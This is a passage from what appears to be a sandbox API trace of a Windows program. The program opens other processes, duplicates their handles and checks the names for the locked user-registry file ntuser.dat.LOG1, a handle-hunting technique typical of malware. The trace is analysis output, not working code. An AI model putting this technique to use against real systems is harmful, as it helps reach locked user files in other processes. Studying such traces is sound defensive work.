lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.527] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.528] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.528] CloseHandle (hObject=0x670) returned 1 [0151.528] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.528] CloseHandle (hObject=0x680) returned 1 [0151.528] CloseHandle (hObject=0x62c) returned 1 [0151.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.528] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.529] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.530] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.530] CloseHandle (hObject=0x670) returned 1 [0151.530] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.530] CloseHandle (hObject=0x680) returned 1 [0151.530] CloseHandle (hObject=0x62c) returned 1 [0151.530] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.530] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.531] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.531] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.531] CloseHandle (hObject=0x670) returned 1 [0151.531] CloseHandle (hObject=0x680) returned 1 [0151.532] CloseHandle (hObject=0x62c) returned 1 [0151.532] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.532] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.533] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.533] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.533] CloseHandle (hObject=0x670) returned 1 [0151.533] CloseHandle (hObject=0x680) returned 1 [0151.533] CloseHandle (hObject=0x62c) returned 1 [0151.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.533] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.534] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.535] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.535] CloseHandle (hObject=0x670) returned 1 [0151.535] _wcsicmp (_Str1="\\Credentials", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.535] CloseHandle (hObject=0x680) returned 1 [0151.535] CloseHandle (hObject=0x62c) returned 1 [0151.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.535] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.536] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.537] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.537] CloseHandle (hObject=0x670) returned 1 [0151.537] _wcsicmp (_Str1="\\Credentials", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.537] CloseHandle (hObject=0x680) returned 1 [0151.537] CloseHandle (hObject=0x62c) returned 1 [0151.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.537] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.538] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.538] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.539] CloseHandle (hObject=0x670) returned 1 [0151.539] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.539] CloseHandle (hObject=0x680) returned 1 [0151.539] CloseHandle (hObject=0x62c) returned 1 [0151.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.539] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.539] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.540] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.540] CloseHandle (hObject=0x670) returned 1 [0151.540] CloseHandle (hObject=0x680) returned 1 [0151.540] CloseHandle (hObject=0x62c) returned 1 [0151.540] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.540] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.541] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.541] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.542] CloseHandle (hObject=0x670) returned 1 [0151.542] CloseHandle (hObject=0x680) returned 1 [0151.542] CloseHandle (hObject=0x62c) returned 1 [0151.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.542] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.543] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.543] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.543] CloseHandle (hObject=0x670) returned 1 [0151.543] CloseHandle (hObject=0x680) returned 1 [0151.543] CloseHandle (hObject=0x62c) returned 1 [0151.543] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0151.543] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.544] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.545] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.545] CloseHandle (hObject=0x670) returned 1 [0151.545] CloseHandle (hObject=0x680) returned 1 [0151.545] CloseHandle (hObject=0x62c) returned 1 [0151.545] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.545] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.545] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.546] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.546] CloseHandle (hObject=0x670) returned 1 [0151.546] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.546] CloseHandle (hObject=0x680) returned 1 [0151.546] CloseHandle (hObject=0x62c) returned 1 [0151.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.546] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.547] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.549] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.549] CloseHandle (hObject=0x670) returned 1 [0151.549] CloseHandle (hObject=0x680) returned 1 [0151.549] CloseHandle (hObject=0x62c) returned 1 [0151.549] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.549] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.550] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.550] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.550] CloseHandle (hObject=0x670) returned 1 [0151.550] CloseHandle (hObject=0x680) returned 1 [0151.550] CloseHandle (hObject=0x62c) returned 1 [0151.550] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.550] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.551] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.551] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.552] CloseHandle (hObject=0x670) returned 1 [0151.552] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.552] CloseHandle (hObject=0x680) returned 1 [0151.552] CloseHandle (hObject=0x62c) returned 1 [0151.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.552] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.553] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.553] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.553] CloseHandle (hObject=0x670) returned 1 [0151.553] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.553] CloseHandle (hObject=0x680) returned 1 [0151.554] CloseHandle (hObject=0x62c) returned 1 [0151.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.554] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.554] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.555] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.556] CloseHandle (hObject=0x670) returned 1 [0151.556] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.556] CloseHandle (hObject=0x680) returned 1 [0151.556] CloseHandle (hObject=0x62c) returned 1 [0151.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0151.556] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.556] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.557] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.557] CloseHandle (hObject=0x670) returned 1 [0151.557] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.557] CloseHandle (hObject=0x680) returned 1 [0151.557] CloseHandle (hObject=0x62c) returned 1 [0151.557] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.557] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.558] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.558] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.558] CloseHandle (hObject=0x670) returned 1 [0151.558] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.558] CloseHandle (hObject=0x680) returned 1 [0151.559] CloseHandle (hObject=0x62c) returned 1 [0151.559] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.559] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.559] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.560] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.560] CloseHandle (hObject=0x670) returned 1 [0151.560] CloseHandle (hObject=0x680) returned 1 [0151.560] CloseHandle (hObject=0x62c) returned 1 [0151.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.560] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.561] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.561] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.562] CloseHandle (hObject=0x670) returned 1 [0151.562] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.562] CloseHandle (hObject=0x680) returned 1 [0151.562] CloseHandle (hObject=0x62c) returned 1 [0151.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.562] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.562] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.563] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.564] CloseHandle (hObject=0x670) returned 1 [0151.564] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.564] CloseHandle (hObject=0x680) returned 1 [0151.564] CloseHandle (hObject=0x62c) returned 1 [0151.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.564] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.565] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.566] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.566] CloseHandle (hObject=0x670) returned 1 [0151.566] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0151.566] CloseHandle (hObject=0x680) returned 1 [0151.566] CloseHandle (hObject=0x62c) returned 1 [0151.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.566] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.567] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.568] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.568] CloseHandle (hObject=0x670) returned 1 [0151.568] CloseHandle (hObject=0x680) returned 1 [0151.568] CloseHandle (hObject=0x62c) returned 1 [0151.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0151.568] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.569] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.570] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.570] CloseHandle (hObject=0x670) returned 1 [0151.570] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 7 [0151.570] CloseHandle (hObject=0x680) returned 1 [0151.570] CloseHandle (hObject=0x62c) returned 1 [0151.570] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.570] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.571] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.572] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.572] CloseHandle (hObject=0x670) returned 1 [0151.572] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.572] CloseHandle (hObject=0x680) returned 1 [0151.572] CloseHandle (hObject=0x62c) returned 1 [0151.572] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.572] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.573] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.573] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.573] CloseHandle (hObject=0x670) returned 1 [0151.573] CloseHandle (hObject=0x680) returned 1 [0151.573] CloseHandle (hObject=0x62c) returned 1 [0151.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.573] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.574] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.575] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.575] CloseHandle (hObject=0x670) returned 1 [0151.575] CloseHandle (hObject=0x680) returned 1 [0151.575] CloseHandle (hObject=0x62c) returned 1 [0151.575] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.575] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.576] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.577] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: 